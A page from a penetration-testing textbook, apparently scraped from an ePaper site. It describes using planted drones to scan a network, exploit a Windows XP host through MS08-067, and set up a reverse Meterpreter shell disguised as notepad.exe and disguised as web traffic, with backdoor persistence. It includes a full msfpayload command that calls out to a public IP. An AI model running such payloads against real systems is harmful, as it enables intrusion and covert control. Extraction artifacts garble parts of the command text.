Hacking_and_Penetration_Testing_with_Low_Power_Devices
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
<strong>Penetration</strong> testing <strong>with</strong> multiple drones<br />
199<br />
be connected to this drone <strong>and</strong> used to collect all wireless traffic on the PFunEd network<br />
for the remainder of the penetration test.<br />
Either the conference room or the receptionist drone can be used to scan the network<br />
for interesting targets. The drone in the conference room might be preferable on<br />
the off chance that the receptionist’s computer is shut down every evening. The<br />
nmap-scan.py script from the previous chapter might be h<strong>and</strong>y for this. Recall that<br />
in addition to displaying results on the screen, the scan data are stored in a JSON file<br />
for use in later scripts.<br />
The nmap scan reveals two targets of interest. One target is a Windows XP<br />
machine at address 192.168.2.185 in the sales department that is potentially vulnerable.<br />
The other interesting target is a development server at address 192.168.2.158<br />
<strong>with</strong> a plethora of services including git, SSH, FTP, <strong>and</strong> several databases. OpenVAS<br />
will be run against both of these targets to detect any quick wins. The scan also<br />
revealed that the rouge access point is a NETGEAR router attached to the PFunEd<br />
network at address 192.168.2.186. The drone has been assigned <strong>and</strong> address of<br />
192.168.2.197.<br />
Before the OpenVAS scan can be conducted, the OpenVAS server must be<br />
started. When not in use, this server should be disabled because it consumes a lot<br />
of resources <strong>and</strong> will greatly increase boot time if automatically started on boot.<br />
Recall that the server will attempt to update itself if it is run from a machine <strong>with</strong><br />
the Internet access.<br />
Running the openvas-scan.py script from the previous chapter (which will iterate<br />
over live hosts from the nmap scan) reveals no well-known vulnerabilities on the<br />
Linux development server <strong>and</strong> verifies that the salesman’s Windows XP machine<br />
is exploitable via the MS08-067 vulnerability. As before, the msfcli utility can be<br />
used to exploit the machine <strong>and</strong> drop a payload, extract files <strong>and</strong> password hashes,<br />
open a shell, etc.<br />
In this case, a reverse TCP Meterpreter shell will be used as a payload. A reverse<br />
payload causes a compromised machine to connect to another machine instead of<br />
listening on a port. This is done to limit the likelihood of things being blocked by<br />
firewalls. To make the most out of the situation, a connection will be made to port<br />
80 on a Linux server back at the office <strong>with</strong> a static IP address. The Linux machine<br />
will be running a h<strong>and</strong>ler on port 80. Traffic from the exploited machine will appear<br />
as normal Web traffic to any administrators at PFE. An intern from a local university<br />
will operate the machine at the office.<br />
The multih<strong>and</strong>ler must be started at the machine back at the office. The machine<br />
has a public Internet address of 97.64.185.147. The series of comm<strong>and</strong>s required to<br />
start the multih<strong>and</strong>ler on this machine are shown in Figure 7.20.<br />
A payload to connect back to the intern’s machine can be created <strong>with</strong> the msfpayload<br />
utility. The correct comm<strong>and</strong> is msfpayload windows/meterpreter/reverse_tcp<br />
LHOST¼ 97.64.185.147 LPORT¼80 X > /tmp/notepad.exe. This will be<br />
uploaded <strong>and</strong> executed using the Metasploit payload upexec. If needed, this payload<br />
can be set to autostart or a backdoor can be installed by the intern using the<br />
Meterpreter shell.